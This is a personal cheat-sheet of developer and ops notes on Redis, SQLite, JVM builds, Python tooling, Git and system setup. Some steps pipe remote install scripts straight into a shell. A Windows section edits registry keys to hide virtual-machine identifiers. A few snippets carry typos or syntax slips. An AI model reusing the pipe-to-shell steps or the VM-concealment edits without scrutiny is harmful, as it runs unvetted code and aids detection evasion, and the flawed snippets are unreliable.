当一个redis是master时,如果它不能向至少一个slave写数据(上面的min-slaves-to-write指定了slave的数量),它将会拒绝接受客户端的写请求。由于复制是异步的,master无法向slave写数据意味着slave要么断开连接了,要么不在指定时间内向master发送同步数据的请求了(上面的min-slaves-max-lag指定了这个时间)

向sentinel订阅消息

psubscribe *
psubscribe sdown
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>

所有收到的消息的消息格式

    +reset-master <instance details> -- 当master被重置时.
    +slave <instance details> -- 当检测到一个slave并添加进slave列表时.
    +failover-state-reconf-slaves <instance details> -- Failover状态变为reconf-slaves状态时
    +failover-detected <instance details> -- 当failover发生时
    +slave-reconf-sent <instance details> -- sentinel发送SLAVEOF命令把它重新配置时
    +slave-reconf-inprog <instance details> -- slave被重新配置为另外一个master的slave,但数据复制还未发生时。
    +slave-reconf-done <instance details> -- slave被重新配置为另外一个master的slave并且数据复制已经与master同步时。
    -dup-sentinel <instance details> -- 删除指定master上的冗余sentinel时 (当一个sentinel重新启动时,可能会发生这个事件).
    +sentinel <instance details> -- 当master增加了一个sentinel时。
    +sdown <instance details> -- 进入SDOWN状态时;
    -sdown <instance details> -- 离开SDOWN状态时。
    +odown <instance details> -- 进入ODOWN状态时。
    -odown <instance details> -- 离开ODOWN状态时。
    +new-epoch <instance details> -- 当前配置版本被更新时。
    +try-failover <instance details> -- 达到failover条件,正等待其他sentinel的选举。
    +elected-leader <instance details> -- 被选举为去执行failover的时候。
    +failover-state-select-slave <instance details> -- 开始要选择一个slave当选新master时。
    no-good-slave <instance details> -- 没有合适的slave来担当新master
    selected-slave <instance details> -- 找到了一个适合的slave来担当新master
    failover-state-send-slaveof-noone <instance details> -- 当把选择为新master的slave的身份进行切换的时候。
    failover-end-for-timeout <instance details> -- failover由于超时而失败时。
    failover-end <instance details> -- failover成功完成时。
    switch-master <master name> <oldip> <oldport> <newip> <newport> -- 当master的地址发生变化时。通常这是客户端最感兴趣的消息了。
    +tilt -- 进入Tilt模式。
    -tilt -- 退出Tilt模式。

3.5.6 - Redis Type

redisObject

Redis 类型系统的核心,数据库中的每个键、值,以及Redis 本身处理的参数,都表示为这种数据类型

// server.h
/* The actual Redis Object */
#define OBJ_STRING 0    /* String object. */
#define OBJ_LIST 1      /* List object. */
#define OBJ_SET 2       /* Set object. */
#define OBJ_ZSET 3      /* Sorted set object. */
#define OBJ_HASH 4      /* Hash object. */

/* Objects encoding. Some kind of objects like Strings and Hashes can be
 * internally represented in multiple ways. The 'encoding' field of the object
 * is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0     /* Raw representation */ 						// 编码为字符串
#define OBJ_ENCODING_INT 1     /* Encoded as integer */ 						// 编码为整数
#define OBJ_ENCODING_HT 2      /* Encoded as hash table */					// 编码为哈希表
#define OBJ_ENCODING_ZIPMAP 3  /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */							// 编码为压缩列表
#define OBJ_ENCODING_INTSET 6  /* Encoded as intset */							// 编码为整数集合
#define OBJ_ENCODING_SKIPLIST 7  /* Encoded as skiplist */					// 编码为跳跃表
#define OBJ_ENCODING_EMBSTR 8  /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */

typedef struct redisObject {
    // 数据类型,OBJ_STRING等
    unsigned type:4;
    // 编码方式,OBJ_ENCODING_RAW等
    unsigned encoding:4;
    // #define LRU_BITS 24
    // LRU 时间	
    unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
                            * LFU data (least significant 8 bits frequency
                            * and most significant 16 bits access time). */
    // 引用计数 
    int refcount;
    // 指向对象的值
    void *ptr;
} robj;

类型自省

type keyname

type REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET or REDIS_ZSET,

object encoding keyname

encoding int, embstr or raw for REDIS_STRING,

object idletime keyname (unit is second)

lru access time

object refcount keyname

only for number-format string, shared object ref count

String

Simple Dynamic String

struct sdshdr {
    int len;
    int free;
    char buf[];
};

REDIS_STRING

int, 8 bytes long

embstr <=39 bytes readonly string

raw > 39 bytes

3.6 - Sqlite

cmd

.help
.databases
.tables

Sample

-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;

create table student (
    name varchar(100) not null primary key,
    class varchar(100),
    gender varchar(100),
    age smallint default -1,
    height decimal(16,6),
    weight decimal(16,6)
);

insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);

date,subject,sdutent_name,score

create table score (
    `date` date not null,
    subject varchar(100),
    student_name varchar(100),
    score decimal(16,6)
);

insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);

4 - Lang

4.1 - JVM

4.1.1 - Maven

test

# org.apache.maven.plugins:maven-surefire-plugin:2.22.0
mvn -Dtest=TestApp1,TestApp2 test
mvn -Dtest=TestApp1#testHello* test
# match pattern 'testHello*' and 'testMagic*' 
mvn -Dtest=TestApp1#testHello*+testMagic* test

4.1.2 - OpenJDK

compile openjdk

jdk18 on mac
git clone https://github.com/openjdk/jdk18.git --depth=1
# autoconf=2.71, ccache=4.6.3, freetype=2.12.1
brew install autoconf ccache freetype

bash ./configure --help
# --enable-debug : --with-debug-level=fastdebug --with-debug-level=slowdebug
# --with-jvm-variants=server
# --with-num-cores=8
# --with-memory-size=8192

# MacOS
# configure: error: No xcodebuild tool and no system framework headers found
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
# jdk17+ require xcode itself
bash ./configure --with-debug-level=slowdebug --enable-ccache --disable-warnings-as-errors
make images
./build/macosx-x86_64-normal-server-slowdebug/jdk/bin/java -version
jdk8u
# jdk8u
bash ./configure --with-num-cores=8 --with-debug-level=slowdebug
jdk17 on debian10
# 10.3 is ok
sudo apt install g++-10

# Compile jdk17 on debian 11.2 gcc 10.2
git clone https://github.com/openjdk/jdk17 --depth=1
cd jdk17u

# tools
sudo apt install gcc g++ make autoconf ccache zip 

# Boot JDK
sudo apt install openjdk-17-jdk

# header files
sudo apt install -y libx11-dev libxext-dev libxrender-dev libxrandr-dev libxtst-dev libxt-dev
sudo apt install -y libcups2-dev libfontconfig1-dev libasound2-dev

bash ./configure --with-debug-level=slowdebug --enable-ccache
make images

4.1.3 - Scala

Scala语法

// import math._ but cos
import math.{cos => _, _}

object HelloWolrd {
    def main(args: Array[String]): Unit = {
        val myVal: String = "Hello World!"
        var myVar: Long = System.currentTimeMillis()
        myVar += 1
        val name = myVal:Object // cast
        println(s"$myVal")
    }
    def patternMatch(x: Any): Any = x match {
        case 1 => 1
        case "five" => 5
        case _ => 0
    }
}
trait Animal {
    final val age = 18
    val color: String
    val kind = "Animal"
    def eq(x: Any): Boolean
    def ne(x: Any): Boolean = !eq(x)
}
class Cat extends Animal {
    override val color = "Yellow"
    override val kind = "Cat"
    def eq(x: Any): Boolean = false
}
class Dog(name: String) extends Animal {
    def this() = this("Dog")
    override val color = "Brown"
    def eq(x: Any): Boolean = true
}
trait Traversable {
    def foreach[U](f: Elem => U): Unit
}

trait Iterable extends Traversable

trait Seq extends Iterable
trait Set extends Iterable
trait Map extends Iterable

import cpllection.JavaConvertions._

4.2 - Python

4.2.1 - Async Python

gunicorn

< A Python WSGI HTTP server, run on Unix-like OS, inspired by ruby unicorn < pre-fork-worker模式,一个master进程管理多个worker进程 < 推荐的worker数量是:(2 * $num_cores) + 1

pip install gunicorn greenlet eventlet gevent

# -k, --worker-class 工作模式
gunicorn -k sync --workers=17 --threads 1 --worker-connections 1000

sync 多进程模式

一次仅处理一个请求

eventlet, gevent 协程模式

协程实现(cooperative multi-threading),利用非同步IO让一个process在等待IO回应时继续处理下个请求

gthread 多线程模式

线程工作模式,利用线程池管理连接

gaiohttp

利用aiohttp库实现异步I/O

4.2.2 - Database client in Python

mysql

# pip3 install PyMySQL
import pymysql

db = pymysql.connect("localhost","user","passwd","testdb" )
cursor = db.cursor()

cursor.execute("SELECT VERSION()")
print(f"Database version : {cursor.fetchone()}")

try:
   cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
   db.commit()
except:
   db.rollback()

cursor.execute("SELECT 1")
rows = cursor.fetchall()
for row in rows:
    print(row[0])

db.close()

rabbitmq

import pika

connection = pika.BlockingConnection(pika.ConnectionParameters('127.0.0.1', 5672))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='Hello World!')
print("[x] Sent 'Hello World!'")
connection.close()

4.2.3 - Install Python

pyenv

curl https://pyenv.run | bash

pyenv install --list
pyenv versions
pyenv global 3.7.15

install python2.7

sudo apt install make gcc g++ patch cmake -y

sudo apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
pyenv install 2.7.18

build from source

wget http://www.python.org/ftp/python/3.7.15/Python-3.7.15.tgz
tar -zxvf Python-3.7.15.tgz
cd Python-3.7.15

./configure --prefix=/opt/python3 --enable-optimizations
make
make install
make clean
make distclean

/opt/python3/bin/python3 -V

python2

debian9

# docker pull debian:9
# docker run -d -it --name debian9 debian:9
# https://mirrors.tuna.tsinghua.edu.cn/help/debian/
apt update 
apt install python python-pip -y
pip install -U setuptools
apt install make gcc g++ patch cmake -y
apt install libssl-dev libbz2-dev libreadline-dev zlib1g.dev libsqlite3-dev libffi-dev lzma-dev libsnappy-dev libjpeg-dev default-libmysqlclient-dev -y
# mysql-python
# for old debian: libmysqlclient-dev
apt install default-libmysqlclient-dev -y
pip install mysql-python

# pyarrow
apt install -y -V ca-certificates lsb-release wget
wget https://apache.jfrog.io/artifactory/arrow/$(lsb_release --id --short | tr 'A-Z' 'a-z')/apache-arrow-apt-source-latest-$(lsb_release --codename --short).deb -O /tmp/apache-arrow.deb
apt -y install /tmp/apache-arrow.deb
apt -y update
apt -y install libarrow-dev libarrow-python-dev
rm /tmp/apache-arrow.deb

fedora

# docker pull fedora
# docker run -d -it --name fedora fedora
# https://mirrors.tuna.tsinghua.edu.cn/help/fedora/

# python2 is not included
# dnf whatprovides pip
# sudo alternatives --set python /usr/bin/python2

dnf update && dnf install git curl -y
curl https://pyenv.run | bash
cat <<EOF >> ~/.bashrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF
source ~/.bashrc

dnf install make gcc g++ -y
dnf install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel -y
pyenv install 2.7.18
pyenv global 2.7.18
# pyarrow
dnf install cmake libarrow-devel libarrow-python-devel -y
pip install arrow pyarrow

# mysql-python
dnf install mysql-devel -y
pip install mysql-python

4.2.4 - IPython

ipython

ipython --pylab

4.2.5 - Python Pip

Install pip

wget https://bootstrap.pypa.io/get-pip.py -O - | python

Install packages for Mac ARM

numpy

brew install openblas
OPENBLAS="$(brew --prefix openblas)" pip install numpy

4.2.6 - Python Std

base

datetime & time

import datetime
import time

dt = datetime.datetime.now()
unix_sec = time.mktime(dt.timetuple())
dt = datetime.datetime.fromtimestamp(time.time())

s = dt.strftime("%Y-%m-%d %H:%M:%S")
dt = datetime.datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
unix_sec = time.mktime(time.strptime(s, "%Y-%m-%d %H:%M:%S"))
s = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(unix_sec))

random

import random

n_float = random.uniform(0, 10) # [0, 10)
n_float = random.random() # [0, 1.0)

# random.randrange([start], stop[, step])
n_int = random.randint(1, 3) # [1, 3]

s_str = random.choice(['r', 'g', 'b'])
s_list = random.sample(['r', 'g', 'b'], 2)

file

ConfigParser

import ConfigParser
conf = ConfigParser.ConfigParser()
conf.read("myapp.ini")
sections = conf.sections()
section = sections [0]
keys = conf.options("sec")
kvs = conf.items("sec")
val = conf.get("sec", "key")
int_val = conf.getint("sec", "key")

4.2.7 - Python Test

unittest

import unittest

class TestStringMethods(unittest.TestCase):

    def test_somecase(self):
        self.assertEqual('foo'.upper(), 'FOO')
        self.assertTrue('FOO'.isupper())
        self.assertFalse('Foo'.isupper())

if __name__ == '__main__':
    unittest.main()
python -m unittest test_module1 test_module2
python -m unittest test_module.TestClass
python -m unittest test_module.TestClass.test_method

python -m unittest -v tests/test_something.py

4.2.8 - Python Web

std

python3 -m http.server 3333
python -m SimpleHTTPServer 3333

fastapi

Python 3.7+

http://127.0.0.1:8000/docs for https://github.com/swagger-api/swagger-ui http://127.0.0.1:8000/redoc for https://github.com/Rebilly/ReDoc

pip install "fastapi[all]"
# use the 'app' object in module fastapi-main(or file called fastapi-main.py)
uvicorn fastapi-main:app --reload
from fastapi import FastAPI

app = FastAPI()

@app.get("/")
async def root(secs: float):
    from time import sleep
    sleep(secs)
    return {"message": "Hello World"}

flask

pip install Flask
python -m flask run 
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def hello_world():
        secs = request.args.get("secs")
        from time import sleep
        sleep(float(secs))
        return {"message": "Hello World"}

if __name__ == '__main__':
    app.run(debug=True)

django

pip install Django
django-admin startproject mysite
cd mysite
python manage.py runserver 0.0.0.0:8000

bottle

from bottle import request, route, run, template
from time import sleep

@route('/hello/<name>')
def hello(name):
    return template('<b>Hello {{name}}</b>!', name=name)

@route('/')
def index():
    secs = request.query.get('secs')
    name = request.query.get('name')
    if secs:
        sleep(float(secs))
    if not name:
        name = "World
    return "Hello {}!".format(name)

run(host='0.0.0.0', port=8000)

trollius

import trollius as asyncio
from trollius import From

@asyncio.coroutine
def factorial(name, number):
    f = 1
    for i in range(2, number + 1):
        print("Task %s: Compute factorial(%d)..." % (name, i))
        yield From(asyncio.sleep(1))
        f *= i
    print("Task %s completed! factorial(%d) is %d" % (name, number, f))

loop = asyncio.get_event_loop()
tasks = [
    asyncio.async(factorial("A", 8)),
    asyncio.async(factorial("B", 3)),
    asyncio.async(factorial("C", 4))]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()

4.3 - Shell

4.3.1 - Frequently used cmds

stat

tree -if | grep -v node_modules | egrep '[.](j|t)sx?$' | xargs wc -l

4.3.2 - Gnu Tools

datetime

date

# 9999-99-99 99:99:99
# 00-23 00-23 00-59
# %t tab char
# %I 00-12
# %j 000-366
# %D MM/dd/yy
# %T hh:mm:ss
date "+%Y-%m-%d %H:%M:%S"

# timestamp, in sec
date +%s

cal

# print cal
cal
cal 9 1752

5 - Ops

5.1 - Os

5.1.1 - CoreOS

rpm-ostree

# omz chsh
sudo rpm-ostree install git wget zsh vim util-linux-user
# compile
sudo rpm-ostree install make gcc g++ patch
# pkg
sudo rpm-ostree install dnf

sudo systemctl reboot

python

curl https://pyenv.run | bash

# add to ~/.zshrc
cat <<EOF >> ~/.zshrc
export PYENV_ROOT="\$HOME/.pyenv"
command -v pyenv >/dev/null || export PATH="\$PYENV_ROOT/bin:\$PATH"
eval "\$(pyenv init -)"
EOF

# dep lib to compile
sudo rpm-ostree install readline-devel zlib-devel openssl-devel bzip2-devel sqlite-devel libffi-devel lzma-sdk-devel

pyenv versions
pyenv install 2.7.18
pyenv install 3.9.13
pyenv global 2.7.18

# pyarrow
sudo rpm-ostree install libarrow-devel libarrow-python-devel

5.1.2 - libvirt

install

  • mac
brew install qemu gcc libvirt
brew install virt-manager

# macOS doesn't support QEMU security features
echo 'security_driver = "none"' >> /opt/homebrew/etc/libvirt/qemu.conf
echo "dynamic_ownership = 0" >> /opt/homebrew/etc/libvirt/qemu.conf
echo "remember_owner = 0" >> /opt/homebrew/etc/libvirt/qemu.conf

brew services start libvirt

vagrant

# https://developer.fedoraproject.org/tools/vagrant/vagrant-libvirt.html
# https://vagrant-libvirt.github.io/vagrant-libvirt/installation.html

# vagrant plugin install vagrant-libvirt
Vagrant.configure("2") do |config|
  config.vm.provider :libvirt do |libvirt|
    libvirt.driver = "qemu"
  end
end
# export VAGRANT_DEFAULT_PROVIDER=libvirt
# vagrant up --provider=libvirt

create

from iso

mkdir ~/vms && cd ~/vms

qemu-img create -f qcow2 debian.qcow2 50g
virsh define debian.xml
virsh start debian
virsh list

from qcow2/raw

# https://cdimage.debian.org/images/cloud/stretch/daily/
# yum install qemu-kvm qemu-kvm-tools virt-manager libvirt virt-install –y

virt-install --name debian --ram 2048 --vcpus=2 --disk path=debian.qcow2 --network=bridge:en0 --force --import --autostart
virsh console --domain debian --force

# KVM format convert
qemu-img convert -p -t directsync -O qcow2 test.raw test.qcow2
qemu-img convert -p -t directsync -O raw test.qcows test.raw

5.1.3 - Oh My Zsh

zsh

sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" 

cp ~/.oh-my-zsh/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/
mv ~/.oh-my-zsh/custom/themes/agnoster.zsh-theme ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# vim ~/.oh-my-zsh/custom/themes/myagnoster.zsh-theme
# replace blue to cyan
# vim ~/.zshrc
# ZSH_THEME="myagnoster"

# add zsh-autosuggestions zsh-syntax-highlighting
cd ~/.oh-my-zsh/custom/plugins
git clone https://github.com/zsh-users/zsh-autosuggestions --depth 1
git clone https://github.com/zsh-users/zsh-syntax-highlighting --depth 1
# . ~/.zshrc

vim

Vim-Plug

# PlugInstall [pluginName]
# PlugUpdate [pluginName]
# PlugDiff : show changelog
# PlugUpgrade : upgrade itself
# PlugStatus
# PlugClean
# PlugSnapshot [filePath] : save a snapshot
curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
" ~/.vim/bundle for Vundle(https://github.com/VundleVim/Vundle.vim
) compatibility
" Plug 'userName/repoName' or Plug 'pluginName' for https://github.com/vim-scripts
" Vim-Plug download Plugin like this: git -C ~/.vim/bundle clone --recursive https://github.com/vim-scripts/L9.git

call plug#begin('~/.vim/bundle')
    " Plug 'file:///path/to/plugin'
    " Plug "git:https://exmaple.com/user/repo.git"

    " dir tree
    Plug 'preservim/nerdtree'
    " start screen
    Plug 'mhinz/vim-startify' 
    " highlighting and navigating through different words in a buffer
    Plug 'lfv89/vim-interestingwords'
    " Check syntax 
    Plug 'dense-analysis/ale'
    " lean & mean status/tabline for vim that's light as air
    Plug 'vim-airline/vim-airline'
call plug#end()

5.1.5 - Windows

虚拟机

去掉虚拟机标识

:echo rename PRLS__ to NOBOX_
REG COPY HKLM\HARDWARE\ACPI\DSDT\PRLS__ HKLM\HARDWARE\ACPI\DSDT\NOBOX_ /s
REG DELETE HKLM\HARDWARE\ACPI\DSDT\PRLS__ /f

:modify SystemBiosVersion
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion /t REG_MULTI_SZ /d "NOBOX   - 1\018.0.2 (53077)\0Some EFI x64 18.0.2-53077 - 12CF55\0" /f
REG ADD HKLM\HARDWARE\DESCRIPTION\System /v VideoBiosVersion /t REG_MULTI_SZ /d "" /f
pause

5.2 - VCS

5.2.1 - Git

git

# mkdir blog && cd blog
# git init
# git remote add origin git@github.com:tukeof/tukeof.github.io.git
git clone git://github.com/tukeof/tukeof.github.io.git blog
cd blog
git add *.md
git commit -m 'initial project version'
git push -u origin master

remote

# 添加一个新的远程Git存储库
git remote add <shortname> <url>
git remote add origin git@github.com:tukeof/tukeof.github.io.git
git remote add origin ssh://username@127.0.0.1/reponame

git remote -v
git remote update
# 也会改变所有远程跟踪分支名称
git remote rename branch1 branch2
git remote rm branch1

git remote show origin

# 在本地新建一个tmp分支,并将远程origin仓库的master分支代码下载到本地tmp分支
git fetch origin master:tmp 
# 比较本地代码与刚刚从远程下载下来的代码的区别
git diff tmp 
# 合并temp分支到本地的master分支
git merge tmp
# 删除tmp分支
git branch -d tmp
# 取回远程主机某个分支的更新,再与本地的指定分支合并
git pull origin master:<branch_name>

add, rm, commit, log

# -a,--all,自动暂存已修改和删除的文件
git commit -a -m 'message'

# 从工作目录和暂存区域中删除文件
git rm <file>
# 仅从暂存区域中删除目录
git rm -r -cached <dir>

git mv README.md README
# mv README.md README
# git rm README.md
# git add README

# --amend
# 占用当前暂存区域并将其用于提交。如果自上次提交后没有进行任何更改,那么快照将看起来完全相同,并且将更改的是提交消息。
git commit --amend

# 撤销对暂存区的更改
git reset HEAD <file>
# 丢弃工作目录中的更改
git checkout - <file>

svn

# clone
svn co https://localhost/user/repo

svn co https://localhost/username/repo -r some_version
svn checkout https://localhost/username/repo/dir1/dir2/proj1

arc

# Phabricator
git clone https://github.com/phacility/libphutil.git
git clone https://github.com/phacility/arcanist.git

#  将 some_install_path/arcanist/bin 加入到$PATH变量中
# 权限认证
arc install-certificate
arc set-config editor "vim"

# 开分支(git branch),或查看当前分支和关联的 revision
arc feature 
# 创建或更新 revision,范围是 origin/master 到最新提交,包括暂存区的内容
arc diff
# 所有 revision 和状态
arc list
# 当前分支上的 commit 会全部被 land, 会先 pull --rebase 再 push
arc land
# 查看 diff 的范围等信息
arc which

Phabricator

// apply patch to current branch
arc patch --diff <patch_version_number> --nocommit --nobranch

5.2.2 - Git Checkout

branch

# list all branch, include local and remote
git branch -a
# delete branch
git branch -d <local_branch>
git push origin --delete <remote_branch>

# list tags
git log --pretty=oneline --abbrev-commit
git show <tag_name>
# tag a tag based on a commit, default cid is `HEAD`
git tag <tag_name> <commit_id>
git tag -a <tag_name> -m "message for tag" <commit_id>

# dangerous operation, it's better no-modification until checkout to `HEAD` 
git checkout <tag_name>
# 
git checkout -b <bra_name> <tag_name>

git tag -l "<prefix>*"
git push origin <tag_name>
# push all tags
git push origin --tags

# delete a local tag
git tag -d <tag_name>
# delete a remote tag
git push origin :refs/tags/<tag_name>

stash

# list the stash entries that you currently have. stash@{0} is the latest entry
git stash list
# save all uncommitted changes
git stash
# apply all uncommitted changes
git stash apply

merge-base

git merge-base origin/master HEAD

rebase

# Assume the following history exists and the current branch is "topic":
#       A - B - C topic
#      /  
# D - E - F -G master

git switch topic
git rebase master
git rebase master topic

# would be
#               A'--B'--C' topic
#              /
# D---E---F---G master
graph LR

E --> A --> B --> C(C topic)
D --> E --> F --> G(G master)
mkdir git-repo && cd git-repo
git init --bare
export remote_url=$(pwd)

cd ..
git clone $remote_url git
cd git

# D
echo $(uuidgen) > D && git add . && git commit -m 'D' && git push -u origin master
# D - E
echo $(uuidgen) > E && git add . && git commit -m 'E' && git push -u origin master

git checkout -b topic
git switch master
# D - E - F
echo $(uuidgen) > F && git add . && git commit -m 'F' && git push -u origin master
# D - E - F - G
echo $(uuidgen) > G && git add . && git commit -m 'G' && git push -u origin master

git switch topic
#       A
#      /  
# D - E - F
echo $(uuidgen) > A && git add . && git commit -m 'A' && git push -u origin topic
#       A - B
#      /  
# D - E - F
echo $(uuidgen) > B && git add . && git commit -m 'B' && git push -u origin topic
#       A - B - C topic
#      /  
# D - E - F master
echo $(uuidgen) > C && git add . && git commit -m 'C' && git push -u origin topic

revert

# revert to previous commit
git revert <previous-commit>

reset

# discard changes and reset files to master
git reset --hard origin/master

git reset --hard HEAD
# or save changes
git reset --soft HEAD 

# discard changes and reset to current branch
git checkout . && git clean -xdf

5.2.3 - Git Config

config

git help config
man git-config
git config --list

# 提交时转换为LF,检出时转换为CRLF
git config --global core.autocrlf true
# 提交时转换为LF,检出时不转换
git config --global core.autocrlf input
# 提交检出均不转换
git config --global core.autocrlf false

# 拒绝提交包含混合换行符的文件
git config --global core.safecrlf true
# 允许提交包含混合换行符的文件
git config --global core.safecrlf false
# 提交包含混合换行符的文件时给出警告
git config --global core.safecrlf warn

git config --global alias.co checkout
git config --global alias.br branch
git config --global alias.ci commit
git config --global alias.s status

git config --global alias.unstage 'reset HEAD - '
git config --global alias.last 'log -1 HEAD'
# git config --global alias.l '!ls -lah'
git config --global alias.url 'remote get-url --all origin'

# git config --global core.editor "'C:/Options/Notepad++/notepad++.exe' -multiInst -nosession"
git config --global core.editor vim

.gitconfig

[user]
	name = yourname
	email = youremail
[http]
    #proxy = socks5://127.0.0.1:1080
[https]
    #proxy = socks5://127.0.0.1:1080	
[core]
    autocrlf = input
    safecrlf = true
[alias]
    co = checkout
    br = branch
    ci = commit
    s = statcus
    last = log -1 HEAD
    lg = log --graph
    url = remote get-url --all origin  

.ssh/config

ssh-keygen -t rsa -b 4096 -C "youremail"
host *
    AddKeysToAgent yes
    UseKeychain yes
    TCPKeepAlive yes
    ServerAliveInterval 60
    ServerAliveCountMax 5
    
host github.com
  user git
  hostname github.com
  port 22
  identityfile ~/.ssh/id_rsa

5.2.4 - Git Hook

pre-commit

# https://pre-commit.com/#usage
pip install pre-commit pre-commit-hooks
# write to .git/hooks/pre-commit
pre-commit install
exclude: >
  (?x)(
      ^a/|
      ^b/c/|
      ^d/e/__init__.py
  )  
default_language_version:
    python: python3
repos:
  - repo: https://github.com/PyCQA/isort
    rev: 5.9.3 # tag
    hooks:
      - id: isort # sort imports
  - repo: https://github.com/psf/black
    rev: stable
    hooks:
      - id: black # code formatter
  - repo: https://github.com/pycqa/flake8
    rev: 4.0.1
    hooks:
      - id: flake8 # check the style and quality
        language_version: python2.7
        stages: [manual]

pre-push

5.2.5 - Git How-To

undo untracked

git reset --hard <commit_id>

# show which will be removed, include untracked directories
# -n --dry-run, Don't actually remove anything
git clean -d -n
# delete anyway, no confirm
git clean -d -f

undo not staged change (removal or modification)

# in stage space but changed by external
# touch a && gti add a && rm a, then a has not staged changes

# discard changes in working directory
git restore <files>
# or
git checkout <files>
# update what will be committed
git add <files>

# caused by removal
git rm <files>
# or
git rm --cached <files>

undo add

# undo stage
git restore --staged <files>

# remove from staged space
git rm --cached d

undo commit

# message
git commit --amend -m 'message which will cover the old one'

# undo commit, but not undo add
# --soft, do not touch the index file nor the working tree
# --hard, match the working tree and index to the given tree
# --mixed, reset the index but not the working tree (default)
git reset --soft HEAD^
# undo <n> commits
git reset --soft HEAD~n

merge commit

# reapply n commits
git rebase -i HEAD~n

# pick
# squash
# ...
# squash

git add .
git rebase --continue
# git rebase --abort

git push --force

delete the last commit

# where git interprets x^ as the parent of x 
# + as a forced non-fastforward push. 
git push master +<second-last-commit>^:master

# or
git reset HEAD^ --hard
git push master -f

delete the second last commit

# this will open an editor and show a list of all commits since the commit we want to get rid of
# simply remove the line with the offending commit, likely that will be the first line
git rebase -i <second-last-commit>^

git push master -f

5.2.6 - Git Log

status

git init --bare /path/to/repo/.git
# git remote add origin /path/to/repo/.git
git clone /path/to/repo

# 显示工作目录和当前HEAD提交之间存在差异的路径
git status
# --short
# A added.c
# M modified.cc
# R renamed.h
# D deleted.hh
git status -s

diff

# 将工作目录中的内容与暂存区域中的内容进行比较
git diff
# --cached,将暂存更改与上次提交进行比较  
git diff --staged

git diff oldCommit..newCommit

log

# 按反向时间顺序列出在该存储库中进行的提交
git log
# -p,patch  显示每次提交中引入的差异(补丁输出)
# -2  仅显示最后两个条目
# --stat 在每个提交条目下方打印一个已修改文件的列表,已更改的文件数以及这些文件中添加和删除的行数
# --shortstat 仅显示--stat命令中已更改/插入/删除行。
# --pretty=oneline 在一行上打印每个提交
git log --pretty=oneline
# 短哈希 - 作者名,日期 :注释
git log --pretty=format:"%h - %an, %ar : %s"
# --graph 添加一个很好的小ASCII图,显示您的分支和合并历史记录
git log --pretty=format:"%h %s" --graph

git log -<n>
# --since, --after
# --until, --before
git log --since=2.weeks
git log --since="2008-01-15"
git log --since="2 years 1 day 3 minutes ago"

# --committer 执行提交的用户
# --author 作出修改的用户
# 在提交消息中搜索关键字
git  --author=<author> --grep="keyword"
# 可以指定--author和--grep搜索条件的多个实例
# 这将限制提交输出到与任何--author模式和任何--grep模式匹配的提交
# --all-match 会进一步将输出限制为与所有--grep模式匹配的提交

# 仅显示提交添加或删除与字符串匹配的代码的提交
git log -S function_name

Useful options for git log --pretty=format

OptionDescription of Output
%HCommit hash
%hAbbreviated commit hash
%TTree hash
%tAbbreviated tree hash
%PParent hashes
%pAbbreviated parent hashes
%anAuthor name
%aeAuthor email
%adAuthor date (format respects the –date=option)
